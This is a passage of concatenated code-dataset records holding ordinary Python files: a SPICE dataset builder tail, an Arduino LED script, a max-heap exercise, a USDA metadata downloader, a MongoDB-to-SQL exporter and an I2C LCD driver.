matched))\ndataset = np.fromiter(chain, np.float32).reshape((-1, 16, 16))\n\n# pp(train_dataset[0:2])\nnum_loop = 10\nrange_labels = \\\n (3.593e+2, 6.250e+1), \\\n (6.562e+4, 9.812e+4), \\\n (5.390e-2, 9.109e-2), \\\n (5.468e-2, -6.25e-2)\n\n# list_labels = [[lwr + i * (upp - lwr) / (num_loop - 1) for i in range(num_loop)] for lwr, upp in range_labels]\n# list_labels = (it.islice(it.count(low, (upp - low) / (num_loop - 1)), num_loop) for low, upp in range_labels)\nlist_labels = (np.linspace(low, upp, num_loop) for low, upp in range_labels)\nlabels = np.asarray(list(it.product(*list_labels)), np.float32)\n# pp(train_labels)\n\n\n# pkl_dump(((train_dataset, valid_dataset), (train_labels, valid_labels)), 'BSIM4_dataset')\npkl_dump((dataset, labels), 'pkls/BSIM4_dataset.pkl')\n","sub_path":"model_fitting/data/first_grid_10k/spice_parsing.py","file_name":"spice_parsing.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239834892","text":"#!/usr/bin/env python\n\n#from pyfirmata import Arduino\n#import pyfirmata\n#from time import sleep\n\n#board = pyfirmata.Arduino('/dev/ttyUSB0')\n#it = pyfirmata.util.Iterator(board) # para portas analogicas\n#it.start()\n\n#port = '/dev/ttyACM0' # Leonardo\n#port = '/dev/ttyUSB0' # Uno\n#board = Arduino(port)\n\n#board.digital_write(17, firmata.HIGH)\n#board.delay(2)\n\n#for i in range(50):\n #board.digital[8].write(1) # ON\n #sleep(0.1)\n #board.digital[8].write(0) # OFF\n #sleep(0.1)\n\n#board.exit()\n\n##Piscando led com python\n##importando a biblioteca FIRMATA\nfrom pyfirmata import *\n##conectando ao arduino\na = Arduino('/dev/ttyUSB0', baudrate=57600)\n##especificando o modo que o pino 13 irá trabalhar\n#a.pin_mode(13, firmata.OUTPUT)\n##Delay de 2 segundos\n#a.delay(2)\n\nwhile True:\n ##Colocando 1 na saida digital 13, neste caso 5 volts\n a.digital_write(17, firmata.HIGH)\n a.digital_write(8, firmata.HIGH)\n #a.delay(2)\n ##Colocando 0 na saida digital 13, neste caso 0 volts\n #a.digital_write(8, firmata.LOW)\n 
#a.delay(2)","sub_path":"www/arduino/scripts/shield.py","file_name":"shield.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"643893801","text":"# https://www.hackerearth.com/practice/data-structures/trees/heapspriority-queues/tutorial/\ninputs = iter([\n \"5\",\n \"1 2 3 4 5\",\n \"4\",\n \"1 1\",\n \"1 2\",\n \"1 3\",\n \"2\"\n])\n\nimport math\n\ndef next_line():\n return next(inputs)\n\nN = int(next_line())\nA = [int(x) for x in next_line().split(\" \")]\nA.insert(0, 0)\nq = int(next_line())\n\ndef swap(arr, i, j):\n arr[i], arr[j] = arr[j], arr[i]\n\ndef construct_max_heap(arr, N):\n for i in range(math.floor(N/2), 0, -1):\n # Start heapifying from above leaf nodes, bottoms up\n max_heapify(arr, i, N)\n\ndef max_heapify(arr, i, N):\n left = i*2\n right = i*2+1\n largest = i\n if left <= N and arr[left] > arr[largest]:\n largest = left\n if right <= N and arr[right] > arr[largest]:\n largest = right\n if largest != i:\n swap(arr, i, largest)\n max_heapify(arr, largest, N)\n\ndef increase_value(arr, i, v):\n if v < arr[i]:\n print(\"Unable to increase value, {} is smaller than {}\".format(v, arr[i]))\n else:\n arr[i] = v\n while i > 1 and arr[int(i/2)] < v:\n swap(arr, int(i/2), i)\n i = int(i/2)\n\ndef add(arr, v):\n arr.append(-1)\n i = len(arr) - 1\n increase_value(arr, i, v)\n\ndef maximum(arr):\n return arr[1]\n\nconstruct_max_heap(A, N)\n\nfor i in range(q):\n c = [int(x) for x in next_line().split(\" \")]\n if c[0] == 1:\n add(A, c[1])\n else:\n m = maximum(A)\n print(m)\n","sub_path":"data-structures/max-heap-priority-queue.py","file_name":"max-heap-priority-queue.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561542865","text":"from time import time\nfrom pandas import DataFrame, concat, read_csv\nimport os\nimport urllib.request\nfrom json import loads\n\n#Files created in 'resources/':\n #adc_metadata.csv\n #pubag_metadata_text.csv, pubag_metadata_other.csv\n\ndef get_adc():\n #download AgDataCommons metadata\n directory = 'resources/'\n fn = 'adc_metadata.csv'\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n if not os.path.exists(directory+fn):\n url = 'https://data.nal.usda.gov/data.json'\n print('Downloading metadata....')\n \n try:\n f = urllib.request.urlopen(url, timeout=60).read()\n data = loads(f)['dataset']\n data = DataFrame(data)\n\n data.to_csv(directory+fn, index=False)\n print('Download successful')\n return True\n except:\n print('Timeout: Data not downloaded')\n return False\n \n print('ADC metadata already exists')\n return False\n\ndef format_time(eta):\n #convert seconds to hh:mm:ss\n h = int(eta // 3600)\n eta = eta - 3600 * h\n m = int(eta // 60)\n eta = eta - 60 * m\n formatted = str(h) + 'h:' + str(m) + 'm:' + str(int(eta)) + 's'\n return formatted\n\ndef get_pubag():\n #Download PubAg metadata in chunks, very long! 
save as 2 files\n\n    api_url = 'https://pubag.nal.usda.gov/api/rest/search/?page={}&per_page=100'\n    fn_text = 'resources/pubag_metadata_text.csv'\n    fn_other = 'resources/pubag_metadata_other.csv'\n    n_pubag = loads(urllib.request.urlopen(api_url).read())['hitCount']\n    \n    #Resume ongoing download if exists\n    if os.path.exists('resources/temp/'):\n        print('Resuming download....')\n        pubag_download(api_url, n_pubag)\n        return True\n    \n    #check for completeness\n    if os.path.exists(fn_text) and os.path.exists(fn_other):\n        n_file = 0\n        for line in open(fn_text.format('')):\n            n_file += 1\n        \n        if n_file / n_pubag >= .9:\n            print('PubAg metadata exists and is mostly complete')\n            return False\n        else:\n            print('Data incomplete. Re-downloading....')\n            os.rename(fn_text, 'resources/pubag_metadata_text_old.csv')\n            os.rename(fn_other, 'resources/pubag_metadata_other_old.csv')\n            pubag_download(api_url, n_pubag)\n            return True\n    \ndef pubag_download(api_url, n_pubag):\n    save_dir = 'resources/temp/'\n    fn = '{}.csv'\n    other_fields = ['id','timestamp','author','author_primary','subject','source','journal','date','publication_year','publication_year_rev','issn','type','volume','startpage','endpage','pageoffset','page','doi_url','doi','text_availability','language']\n    text_fields = ['id', 'title', 'abstract']\n    all_fields = other_fields + text_fields[1:]\n    \n    if not os.path.exists(save_dir):\n        print('Creating temp directory')\n        os.mkdir(save_dir)\n    \n    #get starting position\n    get_page = (lambda x: int(x.replace('.csv', '')))\n    pages = [get_page(fn) for fn in next(os.walk(save_dir))[2]]\n    pages.append(0)\n    start_page = max(pages) + 1\n    last_page = n_pubag // 100 + 1\n    \n    #download\n    print('Starting download from page {}'.format(start_page))\n    #initialize before the loop, so a resumed run whose start_page is not\n    #aligned to a 100-page chunk boundary still has these names defined\n    data = {}\n    t0 = time()\n    for page in range(start_page, last_page):\n        \n        if page % 100 == 1:\n            data = {}\n            t0 = time()\n        \n        url = api_url.format(page)\n        new_data = loads(urllib.request.urlopen(url).read())['resultList']\n        for result in new_data:\n            data[result['id']] = {(field): (result[field] if field in result else '') for field in all_fields}\n        \n        if page % 100 == 0:\n            data = DataFrame.from_dict(data, orient='index')\n            data.to_csv(save_dir + fn.format(page), index=False)\n            \n            eta = ((time() - t0)/100) * (last_page - page)\n            eta = format_time(eta) \n            print(' Progress: {}/{} --> ETA: {}'.format(page, last_page-1, eta))\n        \n    \n    #combine and save\n    print('Combining and cleaning temp data, do not interrupt')\n    data = [read_csv(save_dir+fn) for fn in next(os.walk(save_dir))[2]]\n    data = concat(data, axis=0, ignore_index=True)\n    data.drop_duplicates(inplace=True)\n    data[text_fields].to_csv('resources/pubag_metadata_text.csv')\n    data[other_fields].to_csv('resources/pubag_metadata_other.csv')\n    \n    #cleanup\n    for fn in next(os.walk(save_dir))[2]:\n        os.remove(save_dir+fn)\n    os.rmdir(save_dir)\n\n    print('Done')\n    return True\n\nget_adc()\nget_pubag()\n\n\n\n\n","sub_path":"word_vectors/python_scripts/gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"364632050","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017-01-11 15:41\n---------\n@summary: export data from mongo to oracle or mysql\n---------\n@author: Boris\n'''\nimport sys\nsys.path.append('..')\nimport init\n\nfrom db.mongodb import MongoDB\nfrom db.oracledb import OracleDB\nfrom db.mysqldb import MysqlDB\nfrom utils.log import log\nimport utils.tools as tools\nimport os\nos.environ['nls_lang'] = 'AMERICAN_AMERICA.AL32UTF8' # set the client encoding 
to avoid encoding errors when inserting data\n\nclass ExportData():\n    def __init__(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n        '''\n        @summary: initialization\n        ---------\n        @param source_table: source table\n        @param aim_table: target table\n        @param key_map: mapping between the keys of the target table and of the source table\n        eg: key_map = {\n                'aim_key1' : 'str_source_key2', # target key = value of the source key, type str\n                'aim_key2' : 'int_source_key3', # target key = value of the source key, type int\n                'aim_key3' : 'date_source_key4', # target key = value of the source key, type date\n                'aim_key4' : 'vint_id', # target key = literal value, type int\n                'aim_key5' : 'vstr_name', # target key = literal value, type str\n                'aim_key6' : 'sint_select id from xxx' # target key = result of the sql query, type int\n                'aim_key7' : 'sstr_select name from xxx' # target key = result of the sql query, type str\n                'aim_key8' : 'clob_key8' # target key = value of the source key, type str\n            }\n\n        @param unique_key: unique key on which the target database deduplicates\n        @param unique_key_mapping_source_key: key of the source table matching the unique key of the target table; when not empty, rows already present in the target table are updated\n        eg: unique_key_mapping_source_key = {\n                'url':'str_url' # target key = value of the source key, type str\n            }\n        @param condition: which rows to export; defaults to rows with read_status = 0\n        ---------\n        @result:\n        '''\n\n        super(ExportData, self).__init__()\n\n        self._source_table = source_table\n        self._aim_table = aim_table\n        self._key_map = key_map\n        self._unique_key = unique_key\n        self._update_read_status = update_read_status\n        self._condition = condition\n\n        self._mongodb = MongoDB()\n\n        self._is_oracle = False\n        self._export_count = 0\n        self._update_count = 0\n        self._unique_key_mapping_source_key = unique_key_mapping_source_key\n\n\n    def export_to_oracle(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n        if source_table:\n            self._source_table = source_table\n        self._aim_table = aim_table\n        self._key_map = key_map\n        self._unique_key = unique_key\n        self._export_count = 0\n        self._update_count = 0\n        self._unique_key_mapping_source_key = unique_key_mapping_source_key\n        self._update_read_status = update_read_status\n        self._condition = condition\n\n        self._aim_db = OracleDB()\n        self._is_oracle = True\n        self.__export()\n\n    def export_to_mysql(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n        if source_table:\n            self._source_table = source_table\n        self._aim_table = aim_table\n        self._key_map = key_map\n        self._unique_key = unique_key\n        self._export_count = 0\n        self._update_count = 0\n        self._unique_key_mapping_source_key = unique_key_mapping_source_key\n        self._update_read_status = update_read_status\n        self._condition = condition\n\n        self._aim_db = MysqlDB()\n        self.__export()\n\n    # @tools.run_safe_model(__name__)\n    def __export(self):\n        if self._unique_key:\n            self._aim_db.set_unique_key(self._aim_table, self._unique_key)\n\n        aim_keys = tuple(self._key_map.keys())\n        source_keys = tuple(self._key_map.values())\n\n        # split each source key into its type and key (the source key encodes both)\n        keys = []\n        value_types = []\n        for source_key in source_keys:\n            temp_var = source_key.split('_', 1)\n            value_types.append(temp_var[0])\n            keys.append(temp_var[1])\n\n        datas = self._mongodb.find(self._source_table, condition = self._condition)\n        for data in datas:\n            sql = 'insert into ' + self._aim_table + \" (\" + ', '.join(aim_keys) + \") values (\"\n            update_sql = 'update ' + self._aim_table + \" set \"\n            values = []\n            for i in range(len(keys)):\n                if value_types[i] == 'str':\n                    values.append(str(data[keys[i]]).replace(\"'\", 
\"''\"))# if isinstance(data[keys[i]], str) else data[keys[i]]) # 将单引号替换成两个单引号 否者sql语句语法出错\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'clob':\n text = str(data[keys[i]]).replace(\"'\", \"''\")\n if not text:\n sql += \"'%s', \"\n values.append(text)\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n else:\n values_ = tools.cut_string(text, 2000)\n\n clob_text = ''\n for value in values_:\n clob_text += \"to_clob('%s') || \"%value\n\n clob_text = clob_text[:-len(' || ')]\n values.append(clob_text)\n sql += \"%s, \"\n\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n\n elif value_types[i] == 'int':\n if isinstance(data[keys[i]], int):\n values.append(data[keys[i]])\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%values[-1]\n elif isinstance(data[keys[i]], str):\n sql += '%s, '\n if data[keys[i]]:\n values.append(data[keys[i]])\n else:\n values.append('null')\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n else: # _id\n values.append(int(str(data[keys[i]])[-6:], 16))\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%values[-1]\n\n elif value_types[i] == 'date':\n values.append(data[keys[i]].replace('年', '-').replace('月', '-').replace('日', ''))\n if self._is_oracle:\n format_date = 'yyyy-mm-dd hh24:mi:ss'[:len(values[-1]) if len(values[-1]) <= 10 else None]\n sql += \"to_date('%s','{}'), \".format(format_date)\n update_sql += aim_keys[i] + \"= to_date('%s','%s'), \"%(values[-1], format_date)\n else:\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'vint':\n values.append(keys[i])\n sql += '%s, '\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n\n elif value_types[i] == 'vstr':\n values.append(keys[i])\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'sint':\n value = self._oracledb.find(keys[i], fetch_one = True)[0]\n values.append(value)\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%value\n\n elif value_types[i] == 'sstr':\n value = self._oracledb.find(keys[i], fetch_one = True)[0]\n values.append(value)\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%value\n\n else:\n log.error('%s不符合key_map规定格式'%value_types[i])\n return\n\n sql = sql[:-2] + \")\"\n sql = sql%tuple(values)\n\n if self._unique_key_mapping_source_key:\n aim_key = tuple(self._unique_key_mapping_source_key.keys())[0]\n\n value = tuple(self._unique_key_mapping_source_key.values())[0]\n temp_var = value.split('_', 1)\n\n source_key_types = temp_var[0]\n source_key = temp_var[1]\n\n if source_key_types == 'str':\n update_sql = update_sql[:-2] + \" where %s = '%s'\" %(aim_key, data[source_key])\n elif source_key_types == 'int':\n update_sql = update_sql[:-2] + \" where %s = %d\" %(aim_key, data[source_key])\n\n log.debug(sql)\n # tools.write_file(self._aim_table + '.txt', sql, 'w+')\n def exception_callfunc(e):\n if 'ORA-00001' in str(e):\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n if self._aim_db.add(sql, exception_callfunc):\n self._export_count += 1\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n elif self._unique_key_mapping_source_key:\n log.debug(update_sql)\n if self._aim_db.update(update_sql):\n self._update_count += 1\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n\n\n log.debug('''\n 共导出%d条数据\n 共更新%d条数据\n 
'''%(self._export_count, self._update_count))\n\n def close(self):\n self._aim_db.close()\n\n\nif __name__ == '__main__':\n task_id = 22\n\n key_map = {\n 'program_id': 'vint_sequence.nextval',\n 'search_type': 'int_search_type',\n 'program_name': 'str_title',\n 'program_url': 'str_url',\n 'release_date': 'date_release_time',\n 'image_url': 'str_image_url',\n 'program_content':'str_content',\n 'task_id': 'vint_%d'%task_id,\n 'keyword':'str_keyword',\n 'keyword_count':'int_keyword_count',\n 'check_status':'vint_202'\n }\n\n # export = ExportData('VA_content_info', 'tab_ivms_program_info', key_map, 'program_url')\n # export.export_to_oracle()\n format_date = 'yyyy-mm-dd hh24:mi:ss'\n date_str = '2017'\n\n print(len('yyyy-mm-dd'))\n format_date = format_date[:len(date_str) if len(date_str) <= 10 else None]\n print(format_date)\n\n\n","sub_path":"utils/export_data.py","file_name":"export_data.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"270676186","text":"# Copyright 2013 Mark de Jong - Mark@mdejong.de\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom webiopi.utils import *\nfrom webiopi.utils.types import toint\nfrom webiopi.devices.i2c import I2C\nfrom time import sleep, localtime, strftime\n\n\nclass LCD6x20(I2C):\n\n # ----------------------------------------------------------------------\n # Constants\n\n # Port expander registers\n MCP23008_IODIR = 0x00\n MCP23008_IPOL = 0x01\n MCP23008_GPINTEN = 0x02\n MCP23008_DEFVAL = 0x03\n MCP23008_INTCON = 0x04\n MCP23008_IOCON = 0x05\n MCP23008_GPPU = 0x06\n MCP23008_INTF = 0x07\n MCP23008_INTCAP = 0x08\n MCP23008_GPIO = 0x09\n MCP23008_OLAT = 0x0A\n\n # LED backlight\n LCD_LED_OFF = 0x00\n LCD_LED_ON = 0x80\n\n LCD_DATA_E1 = 0x04\n LCD_DATA_E2 = 0x01\n LCD_DATA_RS = 0x02\n\n # LCD Commands\n LCD_CLEARDISPLAY = 0x01\n LCD_RETURNHOME = 0x02\n LCD_ENTRYMODESET = 0x04\n LCD_DISPLAYCONTROL = 0x08\n LCD_CURSORSHIFT = 0x10\n LCD_FUNCTIONSET = 0x20\n LCD_SETCGRAMADDR = 0x40\n LCD_SETDDRAMADDR = 0x80\n\n # Flags for display on/off control\n LCD_DISPLAYON = 0x04\n LCD_DISPLAYOFF = 0x00\n LCD_CURSORON = 0x02\n LCD_CURSOROFF = 0x00\n LCD_BLINKON = 0x01\n LCD_BLINKOFF = 0x00\n\n # Flags for display entry mode\n LCD_ENTRYRIGHT = 0x00\n LCD_ENTRYLEFT = 0x02\n LCD_ENTRYSHIFTINCREMENT = 0x01\n LCD_ENTRYSHIFTDECREMENT = 0x00\n\n # Flags for display/cursor shift\n LCD_DISPLAYMOVE = 0x08\n LCD_CURSORMOVE = 0x00\n LCD_MOVERIGHT = 0x04\n LCD_MOVELEFT = 0x00\n\n # DDRAM settings for BT62005\n KS0073_LINE1_START = 0x00\n KS0073_LINE2_START = 0x20\n KS0073_LINE3_START = 0x40\n KS0073_LINE4_START = 0x00\n KS0073_LINE5_START = 0x20\n KS0073_LINE6_START = 0x40\n\n\n # ----------------------------------------------------------------------\n # Constructor\n\n def __init__(self, slave=0x20):\n slave = toint(slave)\n I2C.__init__(self, slave)\n self.porta = self.LCD_LED_ON\n self.led = self.LCD_LED_ON\n self.writeRegister(self.MCP23008_IODIR, 0x00)\n 
self.writeRegisters( self.MCP23008_IODIR,\n [0b00000000, # IODIR\n 0b00000000, # IPOL\n 0b00000000, # GPINTEN\n 0b00000000, # DEFVAL\n 0b00000000, # INTCON\n 0b00000000, # IOCON\n 0b00000000, # GPPU\n 0b00000000, # INTF\n 0b00000000, # INTCAP\n self.porta | self.led, # GPIO\n self.porta | self.led ])# OLAT\n self.writeRegister( self.MCP23008_IOCON, 0x20 )\n self.displayshift = (self.LCD_CURSORMOVE |\n self.LCD_MOVERIGHT)\n self.displaymode = (self.LCD_ENTRYLEFT |\n self.LCD_ENTRYSHIFTDECREMENT)\n self.displaycontrol = (self.LCD_DISPLAYON |\n self.LCD_CURSOROFF |\n self.LCD_BLINKOFF)\n self.write_lcd(self.LCD_DATA_E1, 0x33) # Init\n self.write_lcd(self.LCD_DATA_E1, 0x32) # Init\n self.write_lcd(self.LCD_DATA_E1, 0x24) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E1, 0x09) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E1, 0x20) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_RETURNHOME)\n self.write_lcd(self.LCD_DATA_E2, 0x33) # Init\n self.write_lcd(self.LCD_DATA_E2, 0x32) # Init\n self.write_lcd(self.LCD_DATA_E2, 0x24) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, 0x09) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, 0x20) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_RETURNHOME)\n\n\n def __str__(self):\n return \"lcd 6x20\"\n\n def __family__(self):\n return \"lcd\"\n\n # ----------------------------------------------------------------------\n # Write operations\n\n # Low-level 4-bit interface for LCD output. This doesn't actually\n # write data, just returns a byte array of the PORTB state over time.\n # Can concatenate the output of multiple calls (up to 8) for more\n # efficient batch write.\n def out4(self, chip_cs, bitmask, value):\n hi = bitmask | ((value >> 4)<<3)\n lo = bitmask | ((value & 0x0F)<<3)\n return [(hi | chip_cs), hi, (lo | chip_cs), lo]\n\n\n # The speed of LCD accesses is inherently limited by I2C through the\n # port expander. A 'well behaved program' is expected to poll the\n # LCD to know that a prior instruction completed. But the timing of\n # most instructions is a known uniform 37 mS. The enable strobe\n # can't even be twiddled that fast through I2C, so it's a safe bet\n # with these instructions to not waste time polling (which requires\n # several I2C transfers for reconfiguring the port direction).\n # The D7 pin is set as input when a potentially time-consuming\n # instruction has been issued (e.g. 
screen clear), as well as on\n # startup, and polling will then occur before more commands or data\n # are issued.\n\n pollables = ( LCD_CLEARDISPLAY, LCD_RETURNHOME )\n\n # Write byte, list or string value to LCD\n def write_lcd(self, chip_cs, value, char_mode=False):\n \"\"\" Send command/data to LCD \"\"\"\n bitmask = self.led;\n if char_mode:\n bitmask |= self.LCD_DATA_RS # Set data bit if not a command\n self.writeRegister( self.MCP23008_IOCON, 0x20 )\n # If string or list, iterate through multiple write ops\n if isinstance(value, str):\n last = len(value) - 1 # Last character in string\n if last>self.cols:\n last = self.cols\n data = [] # Start with blank list\n for i, v in enumerate(value): # For each character...\n # Append 4 bytes to list representing PORTB over time.\n # First the high 4 data bits with strobe (enable) set\n # and unset, then same with low 4 data bits (strobe 1/0).\n data.extend(self.out4(chip_cs, bitmask, ord(v)))\n # I2C block data write is limited to 32 bytes max.\n # If limit reached, write data so far and clear.\n # Also do this on last byte if not otherwise handled.\n if (len(data) >= 32) or (i == last):\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = [] # Clear list for next iteration\n elif isinstance(value, list):\n # Same as above, but for list instead of string\n last = len(value) - 1\n data = []\n for i, v in enumerate(value):\n data.extend(self.out4(chip_cs, bitmask, v))\n if (len(data) >= 32) or (i == last):\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = []\n else:\n # Single byte\n data = self.out4(chip_cs, bitmask, value)\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = []\n self.writeRegister( self.MCP23008_IOCON, 0 )\n # If a poll-worthy instruction was issued, reconfigure D7\n # pin as input to indicate need for polling on next call.\n if (not char_mode) and (value in self.pollables):\n sleep(0.015)\n\n\n # ----------------------------------------------------------------------\n # Utility methods\n\n def begin(self, cols, lines):\n self.currline = 0\n self.cols = cols\n self.numlines = lines\n self.clear()\n\n\n # Puts the MCP23008 back in Bank 0 + sequential write mode so\n # that other code using the 'classic' library can still work.\n # Any code using this newer version of the library should\n # consider adding an atexit() handler that calls this.\n def stop(self):\n self.porta = 0b10000000 # Turn off LEDs on the way out\n sleep(0.0015)\n self.writeRegister( self.MCP23008_IOCON, 0 )\n self.writeRegisters(\n 0,\n [ 0b00000000, # IODIR\n 0b00000000, # IPOL\n 0b00000000, # GPINTEN\n 0b00000000, # DEFVAL\n 0b00000000, # INTCON\n 0b00000000, # IOCON\n 0b00000000, # GPPU\n 0b00000000, # INTF\n 0b00000000, # INTCAP\n self.porta, # GPIO\n self.porta ]) # OLAT\n\n\n def clear(self):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CLEARDISPLAY)\n\n\n def home(self):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_RETURNHOME)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_RETURNHOME)\n\n\n row_offsets = ( KS0073_LINE1_START, KS0073_LINE2_START, KS0073_LINE3_START, KS0073_LINE4_START, KS0073_LINE5_START, KS0073_LINE6_START )\n row_chip_select = ( LCD_DATA_E1, LCD_DATA_E1, LCD_DATA_E1, LCD_DATA_E2, LCD_DATA_E2, LCD_DATA_E2 )\n def setCursor(self, col, line_nr):\n if line_nr > self.numlines:\n line_nr = self.numlines - 1\n elif line_nr < 0:\n line_nr = 0\n self.write_lcd(self.row_chip_select[line_nr], self.LCD_SETDDRAMADDR | (col+self.row_offsets[line_nr]) )\n\n\n def 
display(self):\n \"\"\" Turn the display on (quickly) \"\"\"\n self.displaycontrol |= self.LCD_DISPLAYON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noDisplay(self):\n \"\"\" Turn the display off (quickly) \"\"\"\n self.displaycontrol &= ~self.LCD_DISPLAYON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def cursor(self):\n \"\"\" Underline cursor on \"\"\"\n self.displaycontrol |= self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noCursor(self):\n \"\"\" Underline cursor off \"\"\"\n self.displaycontrol &= ~self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def ToggleCursor(self):\n \"\"\" Toggles the underline cursor On/Off \"\"\"\n self.displaycontrol ^= self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def blink(self):\n \"\"\" Turn on the blinking cursor \"\"\"\n self.displaycontrol |= self.LCD_BLINKON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noBlink(self):\n \"\"\" Turn off the blinking cursor \"\"\"\n self.displaycontrol &= ~self.LCD_BLINKON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def ToggleBlink(self):\n \"\"\" Toggles the blinking cursor \"\"\"\n self.displaycontrol ^= self.LCD_BLINKON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def scrollDisplayLeft(self):\n \"\"\" These commands scroll the display without changing the RAM \"\"\"\n self.displayshift = self.LCD_DISPLAYMOVE | self.LCD_MOVELEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n\n\n def scrollDisplayRight(self):\n \"\"\" These commands scroll the display without changing the RAM \"\"\"\n self.displayshift = self.LCD_DISPLAYMOVE | self.LCD_MOVERIGHT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n\n\n def leftToRight(self):\n \"\"\" This is for text that flows left to right \"\"\"\n self.displaymode |= self.LCD_ENTRYLEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n 